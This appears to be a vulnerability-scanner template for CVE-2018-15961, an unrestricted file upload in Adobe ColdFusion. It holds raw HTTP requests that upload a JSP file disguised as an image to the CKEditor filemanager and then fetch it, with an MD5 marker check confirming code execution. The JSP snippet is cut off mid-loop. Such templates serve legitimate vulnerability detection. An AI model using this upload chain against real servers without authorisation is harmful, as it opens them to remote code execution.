id: CVE-2018-15961 info: name: Adobe ColdFusion Unrestricted File Upload RCE author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 tags: cve,cve2018,adobe,rce,coldfusion,fileupload classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2018-15961 cwe-id: CWE-434 requests: - raw: - | POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------24464570528145 -----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> <% String cve = "CVE-2018-15961"; MessageDigest alg = MessageDigest.getInstance("MD5"); alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); String hx; for (int i=0;i -----------------------------24464570528145 Content-Disposition: form-data; name="path" {{randstr}}.jsp -----------------------------24464570528145-- - | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: - 200